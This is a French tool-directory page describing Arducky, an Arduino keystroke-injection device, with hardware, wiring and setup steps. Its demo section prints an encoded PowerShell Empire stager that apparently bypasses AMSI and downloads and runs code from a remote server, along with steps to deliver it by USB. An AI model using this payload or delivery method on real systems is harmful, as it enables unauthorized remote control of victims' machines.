Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
arducky — Arducky - Interpréteur de scripts Ducky pour Arduino | Kitploit
Outils/GitLabGitLab/creased/arducky
Génération de PayloadsPost-ExploitationHacking MatérielTests d'IntrusionRed Teaming
GitLabcreased/arducky

arducky

Arducky - Interpréteur de scripts Ducky pour Arduino

Voir le dépôt
121il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Site web
Partager

Arducky - Interpréteur de scripts Ducky pour Arduino

Ce projet vise à créer une alternative bon marché (mais tout aussi efficace) au USB Rubber Ducky de Hak5.

Introduction

Le USB Rubber Ducky est un HID (Human Interface Device) programmable avec un langage de script simple permettant aux testeurs de pénétration de concevoir et déployer rapidement et facilement des charges utiles d'audit de sécurité qui imitent la saisie au clavier humaine.

Avec Arducky, vous n'avez à gérer que les scripts Ducky stockés sur une carte MicroSD.

Après la configuration, vous n'aurez plus besoin de reprogrammer votre Arduino pour changer de scripts.

Matériel

Télécharger l’outil
QuantitéArticlePrixDescription
1Arduino Pro Micro ATmega32U4 5V Board$4.11Compatible avec le protocole USB, peut être utilisé comme souris ou clavier HID
1Micro SD Memory Shield$0.78
1Micro USB OTG Adapter$0.99Facultatif. Peut être utilisé pour remplacer le câble micro USB
1DuPont Wires$1.28
1Micro SD Card$18.00Ceci est un exemple, je doute que vous ayez besoin de plus de 1 Go

Formatage

Afin d'utiliser votre carte Micro SD avec Arducky, la carte doit être formatée en FAT32.

Je recommande vivement de formater votre carte SD (même si elle est neuve !), en utilisant le SD Memory Card Formatter officiel de la SDA (SD Association), plutôt que les outils de formatage fournis par votre système d'exploitation.

Câblage

Maintenant que vous avez formaté votre carte MicroSD, connectons le shield MicroSD !

L'interface du contrôleur MicroSD comporte six broches (GND, VCC, MISO, MOSI, SCK, CS).

D'après la documentation SPI d'Arduino, l'interface de contrôle doit être connectée comme suit (à l'aide de fils Dupont) :

arducky_pinout

Note : Comme mentionné dans la section Matériel, le module est conçu pour interagir avec un µC 5 V, vous aurez donc besoin de la broche 5 V sur votre Arduino.

arducky_right

arduino_pro_micro

Configuration

Clonez le projet :

root@kitploit:~
git clone https://gitlab.com/Creased/arducky
cd arducky/

Si vous utilisez un clavier AZERTY, vous devrez également remplacer votre bibliothèque Keyboard (Keyboard.cpp et Keyboard.h) par celle incluse.

Téléversez le sketch arducky.ino sur votre carte Arduino à l'aide de l'IDE Arduino.

Femtoduino

Pour générer le fichier arducky_femto.ino avec une charge utile Ducky Script, vous pouvez utiliser femto_generate_payload.py :

root@kitploit:~
~# python3 femto_generate_payload.py -h
usage: femto_generate_payload.py [-h] [-i ino_file] [-o output_file]
                                          payload_file

Generates payload in arducky_femto.ino from an input Rubber Ducky payload file

positional arguments:
  payload_file          input Rubber Ducky payload file

optional arguments:
  -h, --help            show this help message and exit
  -i ino_file, --ino ino_file
                        input Arducky ino file
  -o output_file, --out output_file
                        output Arducky ino file

Exemple :

root@kitploit:~
~# python3 femto_generate_payload.py -i arducky_femto.ino -o femto.ino demo/script.txt

L'Empire contre-attaque avec Arducky (démo)

Empire est un framework de post-exploitation implémentant la capacité d'exécuter des agents PowerShell sans avoir besoin de powershell.exe, des modules de post-exploitation rapidement déployables allant des keyloggers à Mimikatz.

Dans cette démo, nous déploierons un Empire sur un serveur distant (comme un VPS) sur un nœud Docker et utiliserons Arducky pour le rejoindre.

Configuration

Veuillez suivre les étapes décrites dans ce guide.

Script Ducky

En configurant un nouvel Empire, vous devriez obtenir une charge utile telle que (voir le dossier demo/) :

root@kitploit:~
powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsACQAVAByAHUAZQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBTAEUAcgB2AGkAYwBlAFAATwBJAG4AdABNAGEAbgBBAGcARQBSAF0AOgA6AEUAWABwAEUAYwBUADEAMAAwAEMAbwBOAHQAaQBOAFUARQA9ADAAOwAkAHcAYwA9AE4ARQB3AC0ATwBCAEoAZQBDAFQAIABTAFkAUwB0AEUATQAuAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAHIATwBYAFkAPQBbAFMAeQBTAHQARQBNAC4ATgBFAHQALgBXAGUAQgBSAGUAcQB1AEUAUwBUAF0AOgA6AEQAZQBGAEEAVQBMAHQAVwBlAEIAUABSAG8AWABZADsAJAB3AEMALgBQAHIAbwBYAHkALgBDAHIAZQBEAEUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4ARQBUAC4AQwByAEUARABFAE4AVABJAEEAbABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQBVAEwAVABOAEUAVAB3AG8AcgBLAEMAcgBlAGQARQBuAHQASQBBAGwAcwA7ACQASwA9AFsAUwBZAHMAdABlAE0ALgBUAEUAWABUAC4ARQBOAEMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcASwBBAE4AcwAjADgAJQBtAHAAWgBpAGQAUABTAEwAaABhAF0AZwBWAFsAWQAuAEcAPwBuAGsAfQBGAGMALwAzACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABFAGEARABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMgBtADAARQB6AEsALwBlAEEATQBTAE4AbQAxAEIAaABlAEYAUwBEAGYAZAB3AE0AaQBxAFEAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAHYAcABzADIALgBiAG0AbwBpAG4AZQAuAGYAcgA6ADgAMAA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4AbABvAEEAZABEAGEAdABhACgAJABzAGUAUgArACQAVAApADsAJABJAFYAPQAkAEQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQB0AEEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAHQAaABdADsALQBKAG8ASQBOAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Enregistrez-la dans un fichier nommé stager.txt et exécutez le script create_script.sh pour créer le script Ducky :

root@kitploit:~
./create_script.sh

Copiez le fichier script.txt généré à la racine du système de fichiers de votre carte MicroSD et alimentez l'Arducky.

Voici une vidéo démontrant l'attaque :

Vidéo de démonstration.

Voilà !

arducky_bottom arducky_front arducky_left arducky_top arducky_workbench